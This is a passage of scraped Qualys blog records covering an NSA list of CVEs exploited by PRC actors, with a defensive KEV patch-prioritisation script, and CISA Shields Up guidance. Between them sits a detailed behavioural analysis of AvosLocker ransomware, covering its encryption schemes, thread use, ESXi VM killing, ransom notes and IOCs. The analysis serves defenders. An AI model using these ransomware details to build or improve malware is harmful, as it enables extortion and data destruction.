You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab, by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\nUsing [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also prioritize these vulnerabilities effectively using [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by clicking on the impacted hosts, which helps in identifying and tracking these vulnerabilities. \n\nUsing the Qualys Unified Dashboard, you can track impacted hosts, their status, and overall remediation progress in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend that U.S. and allied governments, critical infrastructure, and private sector organizations apply the mitigation guidance provided to strengthen their defensive posture and reduce the threat of compromise by PRC state-sponsored cyber actors. 
\n\nHere is a summary of the mitigation guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, starting with the CVEs listed in this article and in the [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) catalog. \n * Use phishing-resistant multi-factor authentication and require a unique, strong password for every account. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward a Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest ways for organizations of any size to stay on top of these vulnerabilities and of end-of-life (EOL) network and device infrastructure, as the NSA's general mitigation guidance notes, is to inventory the affected assets and apply patches as soon as possible. Qualys VMDR 2.0 makes this straightforward: you can start a [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect, and patch the high-priority commonly exploited vulnerabilities. 
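The first mitigation, patching in KEV order, is easy to state and tedious to do by hand across a scan export. The script below is an added example (not Qualys, NSA or CISA code) that joins scan findings to a KEV excerpt and orders them by tier: overdue-or-ransomware items on internet-facing assets first, then the same items on internal assets, then KEV entries not yet due, then everything else. Assumptions: the KEV JSON field names are those of the public feed (`vulnerabilities`, `cveID`, `dateAdded`, `dueDate`, `knownRansomwareCampaignUse`); the catalog dates, host names and findings are constructed samples; the reference date is this post's publication date.

```python
"""Rank scan findings by CISA Known Exploited Vulnerabilities (KEV) status.

Added example for this post, not Qualys, NSA or CISA code. Assumptions: the catalog
excerpt uses the public KEV JSON field names ("vulnerabilities" list with cveID,
dateAdded, dueDate, knownRansomwareCampaignUse); the catalog dates, host names and
findings below are constructed samples, not a real download or a real environment.
"""
import json
from datetime import date
from typing import Dict, List

REFERENCE_DATE = date(2022, 10, 7)  # this post's publication date, used as "today"

# Constructed KEV excerpt. CVE IDs come from Table 1 above; the dates are illustrative.
KEV_SNAPSHOT = json.loads("""{"vulnerabilities": [
 {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
  "dateAdded": "2021-12-10", "dueDate": "2021-12-24", "knownRansomwareCampaignUse": "Known"},
 {"cveID": "CVE-2019-11510", "vendorProject": "Ivanti", "product": "Pulse Connect Secure",
  "dateAdded": "2021-11-03", "dueDate": "2022-05-03", "knownRansomwareCampaignUse": "Known"},
 {"cveID": "CVE-2022-1388", "vendorProject": "F5", "product": "BIG-IP",
  "dateAdded": "2022-05-10", "dueDate": "2022-05-31", "knownRansomwareCampaignUse": "Unknown"},
 {"cveID": "CVE-2021-20090", "vendorProject": "Buffalo", "product": "WSR routers",
  "dateAdded": "2022-10-15", "dueDate": "2022-11-05", "knownRansomwareCampaignUse": "Unknown"}
]}""")

# Constructed scan output: one row per (asset, CVE) plus whether the asset is reachable
# from the internet. CVE-2021-41773 is in the real catalog but deliberately absent from
# the excerpt above, to exercise the "not in KEV" fallback.
FINDINGS = [
    {"host": "vpn-gw-01", "cve": "CVE-2019-11510", "internet_facing": True},
    {"host": "build-srv-07", "cve": "CVE-2021-44228", "internet_facing": False},
    {"host": "lb-edge-02", "cve": "CVE-2022-1388", "internet_facing": True},
    {"host": "branch-rtr-11", "cve": "CVE-2021-20090", "internet_facing": True},
    {"host": "web-01", "cve": "CVE-2021-41773", "internet_facing": True},
]


def kev_index(catalog: dict) -> Dict[str, dict]:
    """Map cveID -> catalog entry for constant-time lookups."""
    return {entry["cveID"]: entry for entry in catalog["vulnerabilities"]}


def prioritize(findings: List[dict], catalog: dict, today: date) -> List[dict]:
    """Sort findings into remediation tiers:
    0: in KEV, internet-facing, and (past the CISA due date or used by ransomware)
    1: in KEV and (past due date or used by ransomware), but only reachable internally
    2: in KEV, not yet due, no known ransomware use
    3: not in KEV (fall back to CVSS/TruRisk for ordering)
    Within a tier, the earliest CISA due date comes first."""
    index = kev_index(catalog)
    rows = []
    for f in findings:
        entry = index.get(f["cve"])
        if entry is None:
            rows.append({**f, "tier": 3, "due": None, "days_overdue": None,
                         "ransomware": False, "reason": "not in KEV"})
            continue
        due = date.fromisoformat(entry["dueDate"])
        days_overdue = (today - due).days
        ransomware = entry.get("knownRansomwareCampaignUse") == "Known"
        urgent = days_overdue > 0 or ransomware
        tier = 0 if urgent and f["internet_facing"] else 1 if urgent else 2
        flags = []
        if days_overdue > 0:
            flags.append("overdue by %d days" % days_overdue)
        if ransomware:
            flags.append("ransomware use known")
        if not urgent:
            flags.append("in KEV, due %s" % due.isoformat())
        if f["internet_facing"]:
            flags.append("internet-facing")
        rows.append({**f, "tier": tier, "due": due, "days_overdue": days_overdue,
                     "ransomware": ransomware, "reason": ", ".join(flags)})
    rows.sort(key=lambda r: (r["tier"], r["due"] or date.max, r["host"]))
    return rows


if __name__ == "__main__":
    for row in prioritize(FINDINGS, KEV_SNAPSHOT, REFERENCE_DATE):
        print("tier %d  %-14s %-15s %s" % (row["tier"], row["host"], row["cve"], row["reason"]))
```

Swap `KEV_SNAPSHOT` for the JSON downloaded from the CISA catalog URL above and `FINDINGS` for a VMDR export, and the ordering is the patch queue the NSA guidance asks for; tier 3 is where a risk score such as TruRisk takes over, since KEV membership alone says nothing about vulnerabilities that have not yet been seen exploited.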
\n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T05:27:25", "description": "_AvosLocker is a ransomware group that was identified in 2021, 
specifically targeting Windows machines. Now a new variant of AvosLocker also targets Linux environments. In this blog, we examine the behavior of these two AvosLocker ransomware variants in detail._\n\nAvosLocker is a relatively new ransomware-as-a-service that was first spotted in late June 2021. The attackers use spam email campaigns as the initial infection vector for delivery of the ransomware payload. During encryption, files are given the ".avos" extension; an updated variant uses ".avos2", and the Linux version uses ".avoslinux".\n\nAfter every successful attack, the AvosLocker gang publishes the names of its victims on its leak site hosted on the TOR network and offers the exfiltrated data for sale. URL structure: `hxxp://avosxxx\u2026xxx[.]onion`\n\nThe AvosLocker gang also advertises its latest ransomware variants on the leak site. URL structure: `hxxp://avosjonxxx\u2026xxx[.]onion`\n\nThe gang has claimed, \u201cThe AvosLocker's latest Windows variant is one of the fastest in the market with highly scalable threading and selective ciphers.\u201d They offer an affiliate program that provides ransomware-as-a-service (RaaS) to potential partners in crime.\n\nRecently they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines, which allows the gang to target a wider range of organizations. 
It also possesses the ability to kill ESXi VMs, making it particularly nasty.\n\nAccording to [deepweb research](<https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/>) by Cyble Research Labs, the threat actors behind the AvosLocker ransomware group are exploiting Microsoft Exchange Server vulnerabilities using ProxyShell to compromise the victim\u2019s network.\n\nCVEs involved in these exploits are CVE-2021-34473, CVE-2021-31206, CVE-2021-34523, and CVE-2021-31207.\n\n### Technical Analysis of AvosLocker Windows Variant\n\n#### Command-Line Options\n\nThe following figure shows a sample of the command-line options.\n\nFig. 1: Command Line Option\n\nThe available options allow control over items like enabling/disabling SMB brute force, mutex creation, and the number of concurrent threads. \nIf no options are given, the malware runs with the default options shown in figure 2, where it skips encryption of network drives and SMB shares. It runs 200 concurrent threads of its file encryption routine.\n\nFig. 2: Execution with Default Parameter\n\nDuring execution, the malware console displays detailed information about its progress on the screen (fig. 3).\n\nFig. 3: Progress Details\n\nMost of the strings in the malware are stored XOR-encrypted. The decryption routines are all similar; only the registers and keys differ (fig. 4). Strings are decrypted just before their use.\n\nFig. 4: Commonly Used Decryption Routine\n\nInitially, the malware collects the command-line options provided when the application was launched (fig. 5).\n\nFig. 5: Get command-line Options\n\nThen it decrypts the mutex name \u201cCheic0WaZie6zeiy\u201d and checks whether an instance is already running, to avoid multiple instances (fig. 6).\n\nFig. 6: Mutex Creation\n\nAs shown in figure 7, AvosLocker uses multi-threaded tactics. 
It calls the APIs below to create multiple worker threads and share file paths among them, making full use of the computing power of multi-core CPUs.\n\nAPIs called:\n\n * CreateIoCompletionPort()\n * PostQueuedCompletionStatus()\n * GetQueuedCompletionPort()\n\nFig. 7: Use of CreateIoCompletionPort\n\nThe code creates multiple threads in a loop (fig. 8). The threads are set to the highest priority to encrypt data quickly.\n\nFig. 8: Create Thread In-Loop and Set Priority\n\nAvosLocker ransomware performs a recursive sweep through the file system (fig. 9), searches for attached drives, and enumerates network resources using the APIs WNetOpenEnum() and WNetEnumResource().\n\nFig. 9: Search Network Share\n\nBefore selecting a file for encryption, it checks the file attributes and skips the file if \u201c**FILE_ATTRIBUTE_HIDDEN**\u201d or \u201c**FILE_ATTRIBUTE_SYSTEM**\u201d is set, as shown in figure 10.\n\nFig. 10: Check File Attribute\n\nOnce the file attribute check is passed, it performs a file extension check. It skips a file if its extension matches one of the extensions shown in figure 11.\n\nFig. 11: Skip Extension List\n\nIt also contains a list of files and folders that are skipped during encryption (fig. 12).\n\nFig. 12: Skip File Folder List\n\nAvosLocker uses RSA encryption, and it comes with a fixed hardcoded ID and the attacker's RSA public key (fig. 13).\n\nFig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt the encryption-related information (fig. 14).\n\nFig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) to the end of the file in Base64-encoded format.\n\nFig.15: Encryption Related Information\n\nThen it appends the "avos2" extension to the file using MoveFileWithProgressW (fig. 16).\n\nFig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended the "avos2" extension.\n\nFig. 
17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each directory before encrypting the files in it.\n\nFig. 18: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system while encryption is in progress, to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and obtain the decryption key and decryption application for the files.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned in the ransom note to AvosLocker's website (fig. 19), the victim is redirected to the "payment" page.\n\nFig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\nFig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux & ESXi\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\nFig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an ELF file. As shown in figure 22, the analyzed file is an x64-based Linux executable.\n\nFig. 22: File Details\n\nIt\u2019s a command-line application with several command-line options (fig. 23).\n\nFig. 
23: Command-Line Options\n\nThe `<Thread count>` parameter shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided at execution.\n\nUpon execution, the malware first collects the number of threads that need to be created. Then it checks for the string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for the string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, it calls a routine to kill the running ESXi virtual machines (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machines is shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) in the targeted directory.\n\nFig. 28: Create ransom note\n\nAfter that, it starts building a list of files to be encrypted. Before adding a file path to the list, it checks whether the path is a regular file (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker excludes the ransom note file and any files with the extension \u201cavoslinux\u201d from the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization, as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates that many concurrent threads (fig. 32). This lets it encrypt different files simultaneously at very high speed.\n\nFig. 
32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of the Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information, along with the encryption key used, might be encrypted and then Base64-encoded. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE\u201d. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system while encryption is in progress, to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n\n * Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n * Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n * URL: hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion\n * URL: hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution (T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact (T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery (T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a government\u2019s response capabilities. 
Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. 
We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on the high-level guidelines provided by CISA, Qualys recommends that all organizations take the following actionable steps to adopt a heightened cybersecurity posture and protect critical assets.\n\nThere are four steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of its potential attack surface. Cyber threat actors continuously scan the internet for vulnerable systems to target in attacks and campaigns. Often attackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. 
Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing the security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, and report open ports and the services detected on each port. Qualys CSAM supports an extensive query language that enables teams to report and act on detected external-facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. 
CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus, such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys researchers analyzed all 300+ CVEs in CISA\u2019s Known Exploited Vulnerabilities catalog and mapped them to Qualys QIDs. Many of these CVEs have had patches available for several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerability reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. 
\n\nThe following are some of the critical vulnerabilities cataloged by CISA that are specifically known to be exploited by Russian state-sponsored APT actors for initial access:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored 
actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create patch and configuration-fix jobs to remediate all of these vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the patches required to remediate them, downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed, including new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software is always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and the corresponding support status, to help organizations manage their technical debt and reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk it poses. Prioritize your remediation efforts based on the software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. 
\n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 is the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations\n\nProtect your public cloud infrastructure by securing the following services as a priority:\n\n * **IAM**: Ensure all users have MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with the various admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. 
This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. 
